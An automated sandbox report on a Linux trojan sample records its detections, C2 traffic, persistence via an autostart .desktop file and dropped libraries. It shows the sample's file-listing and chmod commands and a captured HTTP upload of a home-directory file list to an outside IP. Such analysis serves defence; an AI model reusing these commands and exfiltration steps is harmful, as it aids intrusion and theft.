Linux Analysis Report
84.elf

Overview

General Information

Sample name:	84.elf
Analysis ID:	1522470
MD5:	51ac5f4bcffd208899ebe778c1725579
SHA1:	807c42578f63b569f37a95dc29267ef6c4ec9eea
SHA256:	684d950494951cda868a6d1d83e2ab8baedb7b4f2e8b079ab94771fb4fabd09a
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Sample and/or dropped files likely contain functionality related to malicious behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Sample tries to persist itself using .desktop files

Uses known network protocols on non-standard ports

Writes ELF files to hidden directories

Creates hidden files and/or directories

Detected TCP or UDP traffic on non-standard ports

ELF contains segments with high entropy indicating compressed/encrypted content

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "rm" command used to delete files or directories

Executes the "uname" command used to read OS and architecture name

Sample and/or dropped files contains symbols with suspicious names

Sample has stripped symbol table

Sample tries to set the executable flag

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 84.elf

Avira: detected

Antivirus detection for dropped file

Source: /root/.gvfs/84.elf

Avira: detection malicious, Label: LINUX/AVI.Agent.xapoa

Multi AV Scanner detection for submitted file

Source: 84.elf	ReversingLabs: Detection: 58%
Source: 84.elf	Virustotal: Detection: 52%			Perma Link

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2829852 - Severity 1 - ETPRO MALWARE Py/Cannibal RAT Checkin M2 : 192.168.2.23:60528 -> 84.247.176.126:33548

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 60486 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60486
Source: unknown	Network traffic detected: HTTP traffic on port 60488 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60488
Source: unknown	Network traffic detected: HTTP traffic on port 60490 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60490
Source: unknown	Network traffic detected: HTTP traffic on port 60492 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60492
Source: unknown	Network traffic detected: HTTP traffic on port 60494 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60494
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60496
Source: unknown	Network traffic detected: HTTP traffic on port 60498 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60498
Source: unknown	Network traffic detected: HTTP traffic on port 60500 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60500
Source: unknown	Network traffic detected: HTTP traffic on port 60502 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60502
Source: unknown	Network traffic detected: HTTP traffic on port 60504 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60504
Source: unknown	Network traffic detected: HTTP traffic on port 60506 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60506
Source: unknown	Network traffic detected: HTTP traffic on port 60508 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60508
Source: unknown	Network traffic detected: HTTP traffic on port 60510 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60510
Source: unknown	Network traffic detected: HTTP traffic on port 60512 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60512
Source: unknown	Network traffic detected: HTTP traffic on port 60514 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60514
Source: unknown	Network traffic detected: HTTP traffic on port 60516 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60516
Source: unknown	Network traffic detected: HTTP traffic on port 60518 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60518
Source: unknown	Network traffic detected: HTTP traffic on port 60520 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60520
Source: unknown	Network traffic detected: HTTP traffic on port 60522 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60522
Source: unknown	Network traffic detected: HTTP traffic on port 60524 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60524
Source: unknown	Network traffic detected: HTTP traffic on port 60526 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60526
Source: unknown	Network traffic detected: HTTP traffic on port 60528 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60528
Source: unknown	Network traffic detected: HTTP traffic on port 60530 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60530
Source: unknown	Network traffic detected: HTTP traffic on port 60532 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60532
Source: unknown	Network traffic detected: HTTP traffic on port 60534 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60534

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.23:60486 -> 84.247.176.126:33548

Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126

Source: unknown

HTTP traffic detected: POST /api/root_265403912816988/upload HTTP/1.1Host: 84.247.176.126:33548Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.18.4Content-Length: 269Content-Type: multipart/form-data; boundary=12b1182436e74c268d609ba7cbab3f4cData Raw: 2d 2d 31 32 62 31 31 38 32 34 33 36 65 37 34 63 32 36 38 64 36 30 39 62 61 37 63 62 61 62 33 66 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 65 64 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6c 69 73 74 2e 74 78 74 22 0d 0a 0d 0a 2e 2f 2e 62 61 73 68 72 63 0a 2e 2f 2e 70 72 6f 66 69 6c 65 0a 2e 2f 2e 73 73 68 2f 61 75 74 68 6f 72 69 7a 65 64 5f 6b 65 79 73 0a 2e 2f 2e 63 6f 6e 66 69 67 2f 6d 69 6d 65 61 70 70 73 2e 6c 69 73 74 0a 2e 2f 2e 76 69 6d 69 6e 66 6f 0a 2e 2f 2e 6c 6f 63 61 6c 2f 73 68 61 72 65 2f 61 70 70 6c 69 63 61 74 69 6f 6e 73 2f 6d 69 6d 65 61 70 70 73 2e 6c 69 73 74 0a 0d 0a 2d 2d 31 32 62 31 31 38 32 34 33 36 65 37 34 63 32 36 38 64 36 30 39 62 61 37 63 62 61 62 33 66 34 63 2d 2d 0d 0a Data Ascii: --12b1182436e74c268d609ba7cbab3f4cContent-Disposition: form-data; name="uploaded"; filename="list.txt"./.bashrc./.profile./.ssh/authorized_keys./.config/mimeapps.list./.viminfo./.local/share/applications/mimeapps.list--12b1182436e74c268d609ba7cbab3f4c--

Source: libpython2.7.so.1.0.16.dr	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: cacert.pem.16.dr	String found in binary or memory: http://www.chambersign.org
Source: libpython2.7.so.1.0.16.dr	String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: libpython2.7.so.1.0.16.dr	String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).xxsubtype
Source: old_root.pem.16.dr	String found in binary or memory: http://www.valicert.com/
Source: PKG-INFO.16.dr	String found in binary or memory: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=master
Source: PKG-INFO.16.dr	String found in binary or memory: https://codecov.io/github/pyca/cryptography?branch=master
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://cryptography.io
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://cryptography.io/
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: PKG-INFO.16.dr	String found in binary or memory: https://github.com/pyca/cryptography
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://pypi.python.org/pypi/cryptography/
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: PKG-INFO.16.dr	String found in binary or memory: https://travis-ci.org/pyca/cryptography
Source: PKG-INFO.16.dr	String found in binary or memory: https://travis-ci.org/pyca/cryptography.svg?branch=master

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Sample and/or dropped files likely contain functionality related to malicious behavior

Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_keylog_callback
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_keylog_callback
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_SESSION_print_keylog

Sample and/or dropped files contains symbols with suspicious names

Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: cryptography.hazmat.bindings._openssl.so.16.dr	ELF static info symbol of dropped file: Cryptography_pem_password_cb
Source: cryptography.hazmat.bindings._openssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: cryptography.hazmat.bindings._openssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libcrypto.so.1.1.16.dr	ELF static info symbol of dropped file: CMS_RecipientInfo_set0_password
Source: libcrypto.so.1.1.16.dr	ELF static info symbol of dropped file: CMS_add0_recipient_password
Source: libcrypto.so.1.1.16.dr	ELF static info symbol of dropped file: CMS_decrypt_set1_password
Source: libpython2.7.so.1.0.16.dr	ELF static info symbol of dropped file: PyOS_InputHook
Source: libpython2.7.so.1.0.16.dr	ELF static info symbol of dropped file: _PyImportHooks_Init
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: _rl_match_hidden_files
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_completion_word_break_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_directory_completion_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_directory_rewrite_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_event_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_execute_next
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_filename_rewrite_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_filename_stat_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_input_available_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_pre_input_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_signal_event_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_startup_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: rl_username_completion_function
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: tilde_expansion_failure_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: tilde_expansion_preexpansion_hook
Source: libreadline.so.7.16.dr	ELF static info symbol of dropped file: username_completion_function
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_password
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_username
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_srp_username_callback
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_get_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_get_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_get_srp_username
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_set_default_passwd_cb
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_set_default_passwd_cb_userdata
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_srp_server_param_with_username
Source: readline.so.16.dr	ELF static info symbol of dropped file: PyOS_InputHook
Source: readline.so.16.dr	ELF static info symbol of dropped file: rl_completion_display_matches_hook
Source: readline.so.16.dr	ELF static info symbol of dropped file: rl_pre_input_hook
Source: readline.so.16.dr	ELF static info symbol of dropped file: rl_startup_hook

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal92.troj.evad.linELF@0/39@0/0

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/84.elf (PID: 6257)

File: /proc/6257/mounts

Jump to behavior

Sample tries to persist itself using .desktop files

Source: /tmp/84.elf (PID: 6257)

File: /root/.config/autostart/gvfs.desktop

Jump to behavior

Writes ELF files to hidden directories

Source: /tmp/84.elf (PID: 6257)

File written to hidden directory: /root/.gvfs/84.elf

Jump to dropped file

Creates hidden files and/or directories

Source: /tmp/84.elf (PID: 6257)	Directory: /root/.gvfs	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.cache	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.ssh	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.config	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Directory: /root/.local	Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/84.elf (PID: 6260)	Shell command executed: sh -c "uname -p 2> /dev/null"	Jump to behavior
Source: /tmp/84.elf (PID: 6384)	Shell command executed: sh -c "cd; find . -type f > /tmp/list.txt"	Jump to behavior
Source: /tmp/84.elf (PID: 6389)	Shell command executed: sh -c "chmod +x /root/.gvfs/84.elf"	Jump to behavior

Executes the "chmod" command used to modify permissions

Source: /bin/sh (PID: 6390)

Chmod executable: /usr/bin/chmod -> chmod +x /root/.gvfs/84.elf

Jump to behavior

Executes the "rm" command used to delete files or directories

Source: /usr/bin/dash (PID: 6228)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dyRqBbtRkK /tmp/tmp.wSbLfeKNbu /tmp/tmp.up7UPCnJlz			Jump to behavior
Source: /usr/bin/dash (PID: 6229)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dyRqBbtRkK /tmp/tmp.wSbLfeKNbu /tmp/tmp.up7UPCnJlz			Jump to behavior

Sample tries to set the executable flag

Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_cffi_backend.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_cn.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_hk.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_iso2022.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_jp.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_kr.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_codecs_tw.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_ctypes.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_hashlib.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_json.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_multibytecodec.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/_ssl.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/bz2.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._constant_time.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._openssl.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libbz2.so.1.0 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libcrypto.so.1.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libexpat.so.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libffi.so.6 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libpython2.7.so.1.0 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libreadline.so.7 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libssl.so.1.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libtinfo.so.5 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/libz.so.1 (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/pyexpat.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/readline.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/resource.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/termios.so (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/certifi/cacert.pem (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/certifi/old_root.pem (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/certifi/weak.pem (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/PKG-INFO (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/dependency_links.txt (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/not-zip-safe (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/requires.txt (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /tmp/84.elf (PID: 6254)	File: /tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/top_level.txt (bits: - usr: - grp: - all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6390)	File: /root/.gvfs/84.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Writes ELF files to disk

Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_cffi_backend.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_cn.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_hk.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_iso2022.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_jp.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_kr.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_codecs_tw.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_ctypes.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_hashlib.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_json.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_multibytecodec.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/_ssl.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/bz2.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._constant_time.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/cryptography.hazmat.bindings._openssl.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libbz2.so.1.0	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libcrypto.so.1.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libexpat.so.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libffi.so.6	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libpython2.7.so.1.0	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libreadline.so.7	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libssl.so.1.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libtinfo.so.5	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/libz.so.1	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/pyexpat.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/readline.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/resource.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6254)	File written: /tmp/_MEITTIAO4/termios.so	Jump to dropped file
Source: /tmp/84.elf (PID: 6257)	File written: /root/.gvfs/84.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 60486 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60486
Source: unknown	Network traffic detected: HTTP traffic on port 60488 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60488
Source: unknown	Network traffic detected: HTTP traffic on port 60490 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60490
Source: unknown	Network traffic detected: HTTP traffic on port 60492 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60492
Source: unknown	Network traffic detected: HTTP traffic on port 60494 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60494
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60496
Source: unknown	Network traffic detected: HTTP traffic on port 60498 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60498
